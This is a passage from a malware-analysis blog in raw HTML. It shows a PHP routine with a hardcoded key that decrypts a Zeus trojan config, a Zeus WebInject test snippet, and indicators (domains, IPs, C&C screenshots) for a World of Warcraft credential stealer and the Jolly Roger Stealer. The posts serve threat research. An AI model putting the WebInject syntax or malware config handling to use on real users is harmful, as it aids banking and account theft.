1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-8MCW6RCPLKtiX5wu2d_YGj9VDvid3Dawph5pBGv4jeVIF1sDmqqj0RVSsgY-r4WWtFg3VZ-MlAyKSF72J5pPNP4yhw7R6kH8wuYJufypRpAvhbEvs14oVQY02EcJ0q-4dokgTMLGdpc/s1600/11-01-2014+16-26-41.png" height="175" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Liz6o95NVOJFmlsuLtUo_jQq6vsGgKot4bEgs6q6WGiyx7rNEObOS0263h1AbpvxbMHkqSSd3L3HExm1Nz1mW9dtT5SMzX9sTk1TdLF_SoqODa690NXnv5EJYNhxtbTK55dD_YZTXWA/s1600/KScn_f.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Liz6o95NVOJFmlsuLtUo_jQq6vsGgKot4bEgs6q6WGiyx7rNEObOS0263h1AbpvxbMHkqSSd3L3HExm1Nz1mW9dtT5SMzX9sTk1TdLF_SoqODa690NXnv5EJYNhxtbTK55dD_YZTXWA/s1600/KScn_f.jpeg" height="300" width="400" /></a></div> <br /> Part of the static config (in plain on generated bot):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-9zxnDuTzKeB_LlmCYddaA_WrOeZ0dUKcw_4MJvKQ3IC4haoS5OGqc_qZQAwjjt1FJW5Y5Zg1Mw-dX9yGLhMk2n6GIFcNLeOxo3Kr54gJPIFtyH4yaMz0E3dcYuZ5CDNXN9xu_cJ-okA/s1600/11-01-2014+16-48-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-9zxnDuTzKeB_LlmCYddaA_WrOeZ0dUKcw_4MJvKQ3IC4haoS5OGqc_qZQAwjjt1FJW5Y5Zg1Mw-dX9yGLhMk2n6GIFcNLeOxo3Kr54gJPIFtyH4yaMz0E3dcYuZ5CDNXN9xu_cJ-okA/s1600/11-01-2014+16-48-22.png" /></a></div> <br /> Installation process/dynamic config decoding (beware, dubstep):<br /> <center> <iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/Z7tEwl1YvMg" width="420"></iframe></center> <br /> And a small code because it's easier to understand:<br /> <div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> <span style="color: black; font-weight: bold;">&lt;?php<br /> &nbsp; &nbsp; <span style="color: black; font-weight: bold;">function</span> decode<span style="color: #009900;">(</span><span style="color: #000088;">$data</span><span style="color: #339933;">,</span> <span style="color: #000088;">$key</span><span style="color: #009900;">)</span> <span style="color: #009900;">{</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000088;">$td</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/mcrypt_module_open" style="color: #000060;"><span style="color: #990000;">mcrypt_module_open</span></a><span style="color: #009900;">(</span>MCRYPT_RIJNDAEL_128<span style="color: #339933;">,</span> <span style="color: blue;">''</span><span style="color: #339933;">,</span> MCRYPT_MODE_ECB<span style="color: #339933;">,</span> <span style="color: blue;">''</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000088;">$iv</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/mcrypt_create_iv" style="color: #000060;"><span style="color: #990000;">mcrypt_create_iv</span></a><span style="color: #009900;">(</span><a href="http://www.php.net/mcrypt_enc_get_iv_size" style="color: #000060;"><span style="color: #990000;">mcrypt_enc_get_iv_size</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$td</span><span style="color: #009900;">)</span><span style="color: #339933;">,</span> MCRYPT_RAND<span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <br /> &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/mcrypt_generic_init" style="color: #000060;"><span style="color: #990000;">mcrypt_generic_init</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$td</span><span style="color: #339933;">,</span> <span style="color: #000088;">$key</span><span style="color: #339933;">,</span> <span style="color: #000088;">$iv</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/mcrypt_generic" style="color: #000060;"><span style="color: #990000;">mcrypt_generic</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$td</span><span style="color: #339933;">,</span> <span style="color: #000088;">$data</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000088;">$data</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/mdecrypt_generic" style="color: #000060;"><span style="color: #990000;">mdecrypt_generic</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$td</span><span style="color: #339933;">,</span> <span style="color: #000088;">$data</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <br /> &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/mcrypt_generic_deinit" style="color: #000060;"><span style="color: #990000;">mcrypt_generic_deinit</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$td</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <a href="http://www.php.net/mcrypt_module_close" style="color: #000060;"><span style="color: #990000;">mcrypt_module_close</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$td</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #b1b100;">return</span> <span style="color: #000088;">$data</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <span style="color: #009900;">}</span><br /> &nbsp; &nbsp; <br /> &nbsp; &nbsp; <span style="color: black; font-weight: bold;">function</span> visualDecrypt<span style="color: #009900;">(</span><span style="color: #339933;">&amp;</span><span style="color: #000088;">$data</span><span style="color: #009900;">)</span> <span style="color: #009900;">{</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000088;">$len</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/strlen" style="color: #000060;"><span style="color: #990000;">strlen</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$data</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #b1b100;">if</span> <span style="color: #009900;">(</span><span style="color: #000088;">$len</span> <span style="color: #339933;">&gt;</span> <span style="color: #cc66cc;">0</span><span style="color: #009900;">)</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #b1b100;">for</span> <span style="color: #009900;">(</span><span style="color: #000088;">$i</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$len</span> <span style="color: #339933;">-</span> <span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span> <span style="color: #000088;">$i</span> <span style="color: #339933;">&gt;</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span> <span style="color: #000088;">$i</span><span style="color: #339933;">--</span><span style="color: #009900;">)</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #000088;">$data</span><span style="color: #009900;">[</span><span style="color: #000088;">$i</span><span style="color: #009900;">]</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/chr" style="color: #000060;"><span style="color: #990000;">chr</span></a><span style="color: #009900;">(</span><a href="http://www.php.net/ord" style="color: #000060;"><span style="color: #990000;">ord</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$data</span><span style="color: #009900;">[</span><span style="color: #000088;">$i</span><span style="color: #009900;">]</span><span style="color: #009900;">)</span> ^ <a href="http://www.php.net/ord" style="color: #000060;"><span style="color: #990000;">ord</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$data</span><span style="color: #009900;">[</span><span style="color: #000088;">$i</span> <span style="color: #339933;">-</span> <span style="color: #cc66cc;">1</span><span style="color: #009900;">]</span><span style="color: #009900;">)</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <span style="color: #009900;">}</span><br /> &nbsp; &nbsp; <br /> &nbsp; &nbsp; <span style="color: #000088;">$data</span> &nbsp; &nbsp;<span style="color: #339933;">=</span> <a href="http://www.php.net/file_get_contents" style="color: #000060;"><span style="color: #990000;">file_get_contents</span></a><span style="color: #009900;">(</span><span style="color: blue;">'config.bin'</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <span style="color: #000088;">$key</span> &nbsp; &nbsp; <span style="color: #339933;">=</span> <a href="http://www.php.net/md5" style="color: #000060;"><span style="color: #990000;">md5</span></a><span style="color: #009900;">(</span><span style="color: blue;">'hasd7h12g1'</span><span style="color: #339933;">,</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <span style="color: #000088;">$decoded</span> <span style="color: #339933;">=</span> decode<span style="color: #009900;">(</span><span style="color: #000088;">$data</span><span style="color: #339933;">,</span> <span style="color: #000088;">$key</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <br /> &nbsp; &nbsp; visualDecrypt<span style="color: #009900;">(</span><span style="color: #000088;">$decoded</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <br /> &nbsp; &nbsp; <span style="color: #000088;">$size</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/strlen" style="color: #000060;"><span style="color: #990000;">strlen</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$decoded</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <br /> &nbsp; &nbsp; <a href="http://www.php.net/header" style="color: #000060;"><span style="color: #990000;">header</span></a><span style="color: #009900;">(</span><span style="color: blue;">'Content-Type: application/octet-stream;'</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <a href="http://www.php.net/header" style="color: #000060;"><span style="color: #990000;">header</span></a><span style="color: #009900;">(</span><span style="color: blue;">'Content-Transfer-Encoding: binary'</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <a href="http://www.php.net/header" style="color: #000060;"><span style="color: #990000;">header</span></a><span style="color: #009900;">(</span><span style="color: blue;">'Content-Length: '</span> <span style="color: #339933;">.</span> <span style="color: #000088;">$size</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <a href="http://www.php.net/header" style="color: #000060;"><span style="color: #990000;">header</span></a><span style="color: #009900;">(</span><span style="color: blue;">'Content-Disposition: attachment; filename=config_decrypted.dll'</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <a href="http://www.php.net/header" style="color: #000060;"><span style="color: #990000;">header</span></a><span style="color: #009900;">(</span><span style="color: blue;">'Expires: 0'</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <a href="http://www.php.net/header" style="color: #000060;"><span style="color: #990000;">header</span></a><span style="color: #009900;">(</span><span style="color: blue;">'Cache-Control: no-cache, must-revalidate'</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <a href="http://www.php.net/header" style="color: #000060;"><span style="color: #990000;">header</span></a><span style="color: #009900;">(</span><span style="color: blue;">'Pragma: no-cache'</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <br /> &nbsp; &nbsp; <span style="color: #b1b100;">echo</span><span style="color: #009900;">(</span><span style="color: #000088;">$decoded</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /> &nbsp; &nbsp; <br /> &nbsp; &nbsp; <a href="http://www.php.net/exit" style="color: #000060;"><span style="color: #990000;">exit</span></a><span style="color: #339933;">;</span> <br /> <span style="color: black; font-weight: bold;">?&gt;</span></span></div> <br /> You can find the decoded modules here:<br /> JAVA: <a href="https://www.virustotal.com/en/file/d8e3cad3a831ef3325c6fdf1640fa09b9f9ae9c1caff7f0aff5196057a98fd09/analysis/1389194044/">7d7ae6ffbd9f3c7673b339f9b94493e5</a><br /> BSS: <a href="https://www.virustotal.com/en/file/2b7e5567984217e9c484896baed2df083ceea98d45d003c4a96775cf7d7d8694/analysis/1389194046/">cc98dabebe047c6115a6cd9d13ed3122</a><br /> KEYLOG: <a href="https://www.virustotal.com/en/file/5ca8eaf746881093764c4ace675e2c935a35c87eb9411b95b53d78f09f93d7cb/analysis/1389194047/">8ac1c7c019d16ff3b8a9543d46ae5e0e</a><br /> <br /> And if you want to test yourself the WebInject, i usually use this code:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> set_url http://requesttests.appspot.com* GP<br /> data_before<br /> &lt;/body&gt;<br /> data_end<br /> <br /> data_inject<br /> &lt;center&gt;&lt;img src="http://temari.fr/webinject.png" alt="Injected!"&gt;&lt;/center&gt;<br /> data_end<br /> <br /> data_after<br /> data_end</div> <br /> <br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZnX5v7RW6O0yMHcjUlPtcPi9cPc5IC6sG_AcHR8kJnQFhXumhSO2TU-SXT7agRTiBCQW8CplaKIjjJXk9pqrzslkRY-P05SdoqfvQKc6wABDsTqoIpuz04ERGw30C1NSOsnsIvfaUSE/s1600/11-01-2014+18-12-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZnX5v7RW6O0yMHcjUlPtcPi9cPc5IC6sG_AcHR8kJnQFhXumhSO2TU-SXT7agRTiBCQW8CplaKIjjJXk9pqrzslkRY-P05SdoqfvQKc6wABDsTqoIpuz04ERGw30C1NSOsnsIvfaUSE/s1600/11-01-2014+18-12-53.png" height="226" width="400" /></a></div> /facepalmhttps://www.xylibox.com/2014/01/decoding-zeus-2961-config.htmlnoreply@blogger.com (Steven K)5tag:blogger.com,1999:blog-5365964245877416061.post-3340813665357730857Fri, 10 Jan 2014 00:10:00 +00002014-01-10T01:20:21.526+01:00142.4.105.98142.4.105.99curse.pwDiskerMal/DllHook-AstealerTroj/WowSpy-ATrojan.Siggen5.64266World Of Warcraftwowmatrix.pwwowmatrix.pw.pw<div class="separator" style="clear: both; text-align: center;"> </div> Recently a malware who target World of Warcraft got identified.<br /> This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use a Battle.net Authenticator.<br /> Yes, this is another post about password stealer mawlare... <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMWTxLW7aG_9SFBQCQHzaY3zMXL5Aj7JTw8HOZMdI1Km4gYCogiMMOP3dtEAsdt8BDapAwLru_EtGCBSm1enK-khvvbbLyfh_BLEzw5ykhoN43IQHhdkJmu4peCXuCrm1YbNf7MCIYOM/s1600/10-01-2014+00-55-11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMWTxLW7aG_9SFBQCQHzaY3zMXL5Aj7JTw8HOZMdI1Km4gYCogiMMOP3dtEAsdt8BDapAwLru_EtGCBSm1enK-khvvbbLyfh_BLEzw5ykhoN43IQHhdkJmu4peCXuCrm1YbNf7MCIYOM/s1600/10-01-2014+00-55-11.jpg" /></a></div> &nbsp;There is no option to retain password on the WoW client.<br /> <br /> The method used to spread this malware is by fake websites leading to malicious download.<br /> The Trojan is bundled with legit programs such as WowMatrix or Curse Client, used by players to manage their AddOns.<br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDA-QxrB7idc_Ai6HEw1N7ukqmYgH1zpYR70XVBEvmhwlrQkB70F2gZTQBdxjWJrPkG6mu34YA96P0wbR-KdpquDPgw4ld1_eTFDjT6bbXVyCfudMu0m3ugY6dmhlrk2JGNlpJEffizZU/s1600/07-01-2014+03-20-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDA-QxrB7idc_Ai6HEw1N7ukqmYgH1zpYR70XVBEvmhwlrQkB70F2gZTQBdxjWJrPkG6mu34YA96P0wbR-KdpquDPgw4ld1_eTFDjT6bbXVyCfudMu0m3ugY6dmhlrk2JGNlpJEffizZU/s1600/07-01-2014+03-20-13.png" height="256" width="400" /></a></div> <br /> Malicious Wowmatrix installer. (<a href="http://vxvault.siri-urz.net/ViriFiche.php?ID=25520">DCDD6986941B2B4E78A558CAB3ACF337</a>)<br /> <br /> Fake sites:<br /> • dns: 1 ›› ip: 142.4.105.98 - adress: WWW.CURSE.PW<br /> • dns: 1 ›› ip: 142.4.105.98 - adress: WWW.WOWMATRIX.PW<br /> • dns: 1 ›› ip: 142.4.105.99 - adress: WWW.WOWMATRIX.PW.PW<br /> <br /> <br /> Blizzard released a statement due to this new threat:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFa6pVVN1PxU9Rj6IM1I8zVOMFzNvMHrrW62ssvn_m1tuvOKBlIXzZ__ehAhp0gO76qvLUmotY3CK9ZmMnF1H9MheILL_04EpzNLY1dukKrtzMlBdVZctjS5ypPlXjHmLAlxwv5g9b0nk/s1600/06-01-2014+22-32-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFa6pVVN1PxU9Rj6IM1I8zVOMFzNvMHrrW62ssvn_m1tuvOKBlIXzZ__ehAhp0gO76qvLUmotY3CK9ZmMnF1H9MheILL_04EpzNLY1dukKrtzMlBdVZctjS5ypPlXjHmLAlxwv5g9b0nk/s1600/06-01-2014+22-32-01.png" height="286" width="400" /></a></div> <br /> I don't know how work the dll for the moment (at least a bit)<br /> My debugger got some stability issue when handling wow.exe but i will get back on this, the mechanism seem interesting (and they even use OutputDebugString!).<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihn_ZMAX809T6npAZ5Ubh_sTd0R0KCT3QHso0cUsvI40iwrdUEFcOphQXnLRvQeOFwLluCryt7O-pFKLR2pAAIwfdiCygzYIsLJ18St-pxSIx0HNhuLx6_acIuhovb3sRaNyP0bRLUVe4/s1600/07-01-2014+00-29-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihn_ZMAX809T6npAZ5Ubh_sTd0R0KCT3QHso0cUsvI40iwrdUEFcOphQXnLRvQeOFwLluCryt7O-pFKLR2pAAIwfdiCygzYIsLJ18St-pxSIx0HNhuLx6_acIuhovb3sRaNyP0bRLUVe4/s1600/07-01-2014+00-29-18.png" height="308" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Network trafic after login in:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbG2Qmi8f_yil8q7MU7Zp_CR8j18HjZjuPBdSbcAr_z4xtTWNpAHeeql-Nf3p3XNdjNua1RDDuBoh4fiFMGFsGlqKf6f2CfffeMhPpMKWuV54jVjg1sYmcNOQAXDpyDHFAjtIEcO7wNI/s1600/06-01-2014+20-47-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbG2Qmi8f_yil8q7MU7Zp_CR8j18HjZjuPBdSbcAr_z4xtTWNpAHeeql-Nf3p3XNdjNua1RDDuBoh4fiFMGFsGlqKf6f2CfffeMhPpMKWuV54jVjg1sYmcNOQAXDpyDHFAjtIEcO7wNI/s1600/06-01-2014+20-47-14.png" height="188" width="400" /></a></div> <br /> C&amp;C (in Chinese):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuiBBk6BiTw97ZzSRqoRPcKsdeW5H7AnnUjVGj9V5JzraSk5Tpd_LVLd7yj49LklivqZPd0lZIDOGqvNlGF2VWcdeUOJiLhYdpkuWUUsCEbFvpIsN0Hz-eKoKNLS8d8l4VHHMExqfZSXI/s1600/06-01-2014+12-05-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuiBBk6BiTw97ZzSRqoRPcKsdeW5H7AnnUjVGj9V5JzraSk5Tpd_LVLd7yj49LklivqZPd0lZIDOGqvNlGF2VWcdeUOJiLhYdpkuWUUsCEbFvpIsN0Hz-eKoKNLS8d8l4VHHMExqfZSXI/s1600/06-01-2014+12-05-39.png" height="400" width="316" /></a></div> <br /> Compromised accounts:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVbTS7wMb3MAdqNEkOy3kf0QPXeK1iZ2QdU24xoV9vkT5mgfC9yoAC37fO-sREk0ZvKwd6gjLtKVH7onhbPxph48o2mpfhhaFKaeVM0Di1x4tBCZCG4RQ89uk_DjmTGITEQnFAZK3PjqQ/s1600/06-01-2014+04-12-28_b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVbTS7wMb3MAdqNEkOy3kf0QPXeK1iZ2QdU24xoV9vkT5mgfC9yoAC37fO-sREk0ZvKwd6gjLtKVH7onhbPxph48o2mpfhhaFKaeVM0Di1x4tBCZCG4RQ89uk_DjmTGITEQnFAZK3PjqQ/s1600/06-01-2014+04-12-28_b.png" height="250" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZFLO3becbFuw2H6-vS98YVZVrALyYuBjMXcGYB2r8OqX8c17pHfsMueTUHu-FXowBxPeBzCJFwKFm7TLJSqZpyWoptePCTYTaV50oZZa0boaBw4gZI6zT0oMTfwkIySiLCsx1dcdEQ1k/s1600/06-01-2014+04-34-48_b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZFLO3becbFuw2H6-vS98YVZVrALyYuBjMXcGYB2r8OqX8c17pHfsMueTUHu-FXowBxPeBzCJFwKFm7TLJSqZpyWoptePCTYTaV50oZZa0boaBw4gZI6zT0oMTfwkIySiLCsx1dcdEQ1k/s1600/06-01-2014+04-34-48_b.png" height="250" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoTvdY77YOzmAC1oNGkfZF06mZc9527iUFxa4odbILT_2m0-uX5lMfe3zHrKELsyBYIAiK7WUSn1a9AYkiA3pTgA1xYNxL10QYrKmB4leUJTk4BzHpaYs39Wn5IiOfQDCxSzh-409rES4/s1600/06-01-2014+04-13-16_b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoTvdY77YOzmAC1oNGkfZF06mZc9527iUFxa4odbILT_2m0-uX5lMfe3zHrKELsyBYIAiK7WUSn1a9AYkiA3pTgA1xYNxL10QYrKmB4leUJTk4BzHpaYs39Wn5IiOfQDCxSzh-409rES4/s1600/06-01-2014+04-13-16_b.png" height="250" width="400" /></a></div> <br /> That all for the moment :)https://www.xylibox.com/2014/01/trojwowspy-a.htmlnoreply@blogger.com (Steven K)6tag:blogger.com,1999:blog-5365964245877416061.post-8136658434817847616Thu, 02 Jan 2014 19:48:00 +00002014-01-02T20:48:24.184+01:00Jolly Roger StealerlamestealerFriend Kafeine have already do <a href="http://malware.dontneedcoffee.com/2013/10/jolly-roger-stealer-c-panel.html">a post</a> on it, although someone recently sent me a url on my cybercrime tracker.. i give a f%$k<br /> • dns: 1 ›› ip: 178.162.193.24 - adresse: LOADER.ISTMEIN.DE<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHDVfJ_9j9JnJPcxOWl3rQei5K6TbZBde5Ohw2Ta1yYkVsgmBQHvIQJeGG7cOoQ2IpYkB2zGyhDWgR5ybwO6vECGtbwKJUDBrr-9ccfAgKZAvoINkvyKK_E6Z68kNlyKUMmoEda2blbA/s1600/27-12-2013+12-20-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzHDVfJ_9j9JnJPcxOWl3rQei5K6TbZBde5Ohw2Ta1yYkVsgmBQHvIQJeGG7cOoQ2IpYkB2zGyhDWgR5ybwO6vECGtbwKJUDBrr-9ccfAgKZAvoINkvyKK_E6Z68kNlyKUMmoEda2blbA/s400/27-12-2013+12-20-12.png" width="400" /></a></div> <br /> Bot statistic:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgufh4gNxjnxjsv3bXqpDTorvaC1WgodtRvaWtWQ_hHGhHyOp4it89gh9UZugr7raLdxiIQkoybA-ZrbJxo80Be4Ea752C9Sw46uO8vJX8SYiV9W6WzwxJXTvQuTsVTKbczpDF1UjtruVM/s1600/27-12-2013+12-20-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgufh4gNxjnxjsv3bXqpDTorvaC1WgodtRvaWtWQ_hHGhHyOp4it89gh9UZugr7raLdxiIQkoybA-ZrbJxo80Be4Ea752C9Sw46uO8vJX8SYiV9W6WzwxJXTvQuTsVTKbczpDF1UjtruVM/s400/27-12-2013+12-20-55.png" width="400" /></a></div> CPU "Arhitecture"<br /> <br /> Task:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY_jnl1JU066h4y2-b6XiK33DmjzK7VelHhBBdj0eKbd5vvbzBKOhntFCtaDPAnJM1XLmTdf4UKllKOUI_Dy7hkBtPocEqAoXxrvU2puk9foMhyphenhyphenx3fz1aEySCcvytJswuqIkrU_zP3Weo/s1600/27-12-2013+12-21-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY_jnl1JU066h4y2-b6XiK33DmjzK7VelHhBBdj0eKbd5vvbzBKOhntFCtaDPAnJM1XLmTdf4UKllKOUI_Dy7hkBtPocEqAoXxrvU2puk9foMhyphenhyphenx3fz1aEySCcvytJswuqIkrU_zP3Weo/s400/27-12-2013+12-21-41.png" width="400" /></a></div> <br /> Search module:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RjvmlAIm7az8ElT6sQh0shIEhCAoGNeyKJExX5rCRFJ-RFI3y9DwCaR-HoBvq3tiEVBx_2JYvgl-buH0W4rPwYxsA5oUdto3DG9fn5JVfxsd9slVTZL-FTGEAjX3V0x1D0-rceMwis/s1600/27-12-2013+12-26-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu9RjvmlAIm7az8ElT6sQh0shIEhCAoGNeyKJExX5rCRFJ-RFI3y9DwCaR-HoBvq3tiEVBx_2JYvgl-buH0W4rPwYxsA5oUdto3DG9fn5JVfxsd9slVTZL-FTGEAjX3V0x1D0-rceMwis/s400/27-12-2013+12-26-49.png" width="400" /></a></div> <br /> HTTP:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYnXLtDK0oNv6ZE_k6DRgtos81hofitWvsXQzH4ZzyRvaymYN3fwxWOYtj1wUPAoWnTDM-pBU_CH9N9oD7WbECIWnHcNULTxWgBL7F4L-IyK4OI0SMhv12nQ1yM2qNfo70GN35D8EHVxo/s1600/27-12-2013+12-24-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYnXLtDK0oNv6ZE_k6DRgtos81hofitWvsXQzH4ZzyRvaymYN3fwxWOYtj1wUPAoWnTDM-pBU_CH9N9oD7WbECIWnHcNULTxWgBL7F4L-IyK4OI0SMhv12nQ1yM2qNfo70GN35D8EHVxo/s400/27-12-2013+12-24-16.png" width="400" /></a></div> <br /> Mail:<br /> <div class="separator" style="clear: both; text-align: center;"> <a 